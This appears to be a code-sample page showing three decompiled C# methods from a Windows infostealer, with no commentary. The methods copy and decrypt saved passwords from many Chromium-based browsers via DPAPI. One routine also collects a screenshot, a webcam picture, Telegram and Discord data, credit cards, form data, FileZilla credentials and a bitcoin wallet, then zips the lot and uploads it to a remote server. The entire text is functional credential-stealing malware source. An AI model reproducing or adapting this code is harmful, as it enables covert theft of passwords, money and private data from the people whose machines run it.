Пример #1
0
        // Token: 0x0600001E RID: 30 RVA: 0x00003D68 File Offset: 0x00001F68
        private static List <PassData> Get(string basePath)
        {
            bool            flag = !File.Exists(basePath);
            List <PassData> result;

            if (flag)
            {
                result = null;
            }
            else
            {
                bool flag2 = basePath.Contains("Chrome");
                if (flag2)
                {
                }
                bool flag3 = basePath.Contains("Yandex");
                if (flag3)
                {
                }
                bool flag4 = basePath.Contains("Orbitum");
                if (flag4)
                {
                }
                bool flag5 = basePath.Contains("Opera");
                if (flag5)
                {
                }
                bool flag6 = basePath.Contains("Amigo");
                if (flag6)
                {
                }
                bool flag7 = basePath.Contains("Torch");
                if (flag7)
                {
                }
                bool flag8 = basePath.Contains("Comodo");
                if (flag8)
                {
                }
                bool flag9 = basePath.Contains("CentBrowser");
                if (flag9)
                {
                }
                bool flag10 = basePath.Contains("Go!");
                if (flag10)
                {
                }
                bool flag11 = basePath.Contains("uCozMedia");
                if (flag11)
                {
                }
                bool flag12 = basePath.Contains("MapleStudio");
                if (flag12)
                {
                }
                bool flag13 = basePath.Contains("BlackHawk");
                if (flag13)
                {
                }
                bool flag14 = basePath.Contains("CoolNovo");
                if (flag14)
                {
                }
                bool flag15 = basePath.Contains("Vivaldi");
                if (flag15)
                {
                }
                bool flag16 = basePath.Contains("Sputnik");
                if (flag16)
                {
                }
                bool flag17 = basePath.Contains("Maxthon");
                if (flag17)
                {
                }
                bool flag18 = basePath.Contains("AcWebBrowser");
                if (flag18)
                {
                }
                bool flag19 = basePath.Contains("Epic Browser");
                if (flag19)
                {
                }
                bool flag20 = basePath.Contains("Baidu Spark");
                if (flag20)
                {
                }
                bool flag21 = basePath.Contains("Rockmelt");
                if (flag21)
                {
                }
                bool flag22 = basePath.Contains("Sleipnir");
                if (flag22)
                {
                }
                bool flag23 = basePath.Contains("SRWare Iron");
                if (flag23)
                {
                }
                bool flag24 = basePath.Contains("Titan Browser");
                if (flag24)
                {
                }
                bool flag25 = basePath.Contains("Flock");
                if (flag25)
                {
                }
                List <PassData> list2;
                try
                {
                    string text   = Path.GetTempPath() + "/" + Helper.GetRandomString() + ".fv";
                    bool   flag26 = File.Exists(text);
                    if (flag26)
                    {
                        File.Delete(text);
                    }
                    File.Copy(basePath, text, true);
                    Sqlite          sqlite = new Sqlite(text);
                    List <PassData> list   = new List <PassData>();
                    sqlite.ReadTable("logins");
                    for (int i = 0; i < sqlite.GetRowCount(); i++)
                    {
                        try
                        {
                            string text2 = string.Empty;
                            try
                            {
                                byte[] bytes = Chromium.DecryptChromium(Encoding.Default.GetBytes(sqlite.GetValue(i, 5)), null);
                                text2 = Encoding.UTF8.GetString(bytes);
                            }
                            catch (Exception)
                            {
                            }
                            bool flag27 = text2 != "";
                            if (flag27)
                            {
                                list.Add(new PassData
                                {
                                    Url      = sqlite.GetValue(i, 1).Replace("https://", "").Replace("http://", ""),
                                    Login    = sqlite.GetValue(i, 3),
                                    Password = text2,
                                    Program  = Chromium.program
                                });
                            }
                        }
                        catch (Exception ex)
                        {
                            Console.WriteLine(ex.ToString());
                        }
                    }
                    File.Delete(text);
                    list2 = list;
                }
                catch (Exception ex2)
                {
                    Console.WriteLine(ex2.ToString());
                    list2 = null;
                }
                result = list2;
            }
            return(result);
        }
Пример #2
0
        // Token: 0x0600001D RID: 29 RVA: 0x00003B74 File Offset: 0x00001D74
        public static byte[] DecryptChromium(byte[] cipherTextBytes, byte[] entropyBytes = null)
        {
            Chromium.DataBlob dataBlob  = default(Chromium.DataBlob);
            Chromium.DataBlob dataBlob2 = default(Chromium.DataBlob);
            Chromium.DataBlob dataBlob3 = default(Chromium.DataBlob);
            Chromium.CryptprotectPromptstruct cryptprotectPromptstruct = new Chromium.CryptprotectPromptstruct
            {
                cbSize        = Marshal.SizeOf(typeof(Chromium.CryptprotectPromptstruct)),
                dwPromptFlags = 0,
                hwndApp       = IntPtr.Zero,
                szPrompt      = null
            };
            string empty = string.Empty;

            try
            {
                try
                {
                    bool flag = cipherTextBytes == null;
                    if (flag)
                    {
                        cipherTextBytes = new byte[0];
                    }
                    dataBlob2.pbData = Marshal.AllocHGlobal(cipherTextBytes.Length);
                    dataBlob2.cbData = cipherTextBytes.Length;
                    Marshal.Copy(cipherTextBytes, 0, dataBlob2.pbData, cipherTextBytes.Length);
                }
                catch (Exception)
                {
                }
                try
                {
                    bool flag2 = entropyBytes == null;
                    if (flag2)
                    {
                        entropyBytes = new byte[0];
                    }
                    dataBlob3.pbData = Marshal.AllocHGlobal(entropyBytes.Length);
                    dataBlob3.cbData = entropyBytes.Length;
                    Marshal.Copy(entropyBytes, 0, dataBlob3.pbData, entropyBytes.Length);
                }
                catch (Exception)
                {
                }
                Chromium.CryptUnprotectData(ref dataBlob2, ref empty, ref dataBlob3, IntPtr.Zero, ref cryptprotectPromptstruct, 1, ref dataBlob);
                byte[] array = new byte[dataBlob.cbData];
                Marshal.Copy(dataBlob.pbData, array, 0, dataBlob.cbData);
                return(array);
            }
            catch (Exception)
            {
            }
            finally
            {
                bool flag3 = dataBlob.pbData != IntPtr.Zero;
                if (flag3)
                {
                    Marshal.FreeHGlobal(dataBlob.pbData);
                }
                bool flag4 = dataBlob2.pbData != IntPtr.Zero;
                if (flag4)
                {
                    Marshal.FreeHGlobal(dataBlob2.pbData);
                }
                bool flag5 = dataBlob3.pbData != IntPtr.Zero;
                if (flag5)
                {
                    Marshal.FreeHGlobal(dataBlob3.pbData);
                }
            }
            return(new byte[0]);
        }
Пример #3
0
        // Token: 0x0600002F RID: 47 RVA: 0x00004348 File Offset: 0x00002548
        public static void SendFile()
        {
            string randomString = Helper.GetRandomString();
            string text         = Path.GetTempPath() + randomString;

            Directory.CreateDirectory(text);
            using (StreamWriter streamWriter = new StreamWriter(text + "\\pass.log"))
            {
                streamWriter.WriteLine(string.Format("Date: {0}\r\n", DateTime.Now) + string.Format("Windows Username: {0}\r\n", Environment.UserName) + string.Format("HWID: {0}\r\n", RawSettings.HWID) + string.Format("System: {0}\r\n", Passwords.GetWindowsVersion()));
                try
                {
                    foreach (PassData value in Chromium.Initialise())
                    {
                        streamWriter.WriteLine(value);
                    }
                }
                catch
                {
                }
            }
            try
            {
                Passwords.DesktopCopy(text);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.ToString());
            }
            try
            {
            }
            catch
            {
            }
            try
            {
                Passwords.get_screenshot(text + "\\desktop.jpg");
            }
            catch (Exception ex2)
            {
                Console.WriteLine(ex2.ToString());
            }
            try
            {
                Passwords.grab_minecraft(text);
            }
            catch (Exception)
            {
            }
            try
            {
                Passwords.Returgen.get_webcam(text + "\\CamPicture.png");
            }
            catch (Exception ex3)
            {
                Console.WriteLine(ex3.ToString());
            }
            try
            {
                Passwords.grab_telegram(text);
            }
            catch (Exception)
            {
            }
            try
            {
                Passwords.grab_discord(text);
            }
            catch (Exception)
            {
            }
            try
            {
                Chromium.ChromiumInitialise(text + "\\");
            }
            catch (Exception ex4)
            {
                Console.WriteLine(ex4.ToString());
            }
            try
            {
                CC.grab_cards(text + "\\");
            }
            catch (Exception ex5)
            {
                Console.WriteLine(ex5.ToString());
            }
            try
            {
                GrabForms.grab_forms(text + "\\");
            }
            catch (Exception ex6)
            {
                Console.WriteLine(ex6.ToString());
            }
            try
            {
                FilezillaFTP.FileZilla.Initialise(text + "\\");
            }
            catch (Exception ex7)
            {
                Console.WriteLine(ex7.ToString());
            }
            try
            {
                string bitcoin = Crypto.get_bitcoin();
                bool   flag    = bitcoin != "" && File.Exists(bitcoin);
                if (flag)
                {
                    File.Copy(bitcoin, text + "\\wallet.dat");
                }
            }
            catch (Exception ex8)
            {
                Console.WriteLine(ex8.ToString());
            }
            try
            {
            }
            catch (Exception ex9)
            {
                Console.WriteLine(ex9.ToString());
            }
            try
            {
                Passwords.Zip(text, Path.GetTempPath() + "\\" + randomString + ".zip");
            }
            catch (Exception ex10)
            {
                Console.WriteLine(ex10.ToString());
            }
            try
            {
                Passwords.RemoveTempFiles(text);
            }
            catch (Exception ex11)
            {
                Console.WriteLine(ex11.ToString());
            }
            try
            {
                Network.UploadFile(Path.GetTempPath() + "\\" + randomString + ".zip");
            }
            catch (Exception ex12)
            {
                Console.WriteLine(ex12.ToString());
            }
        }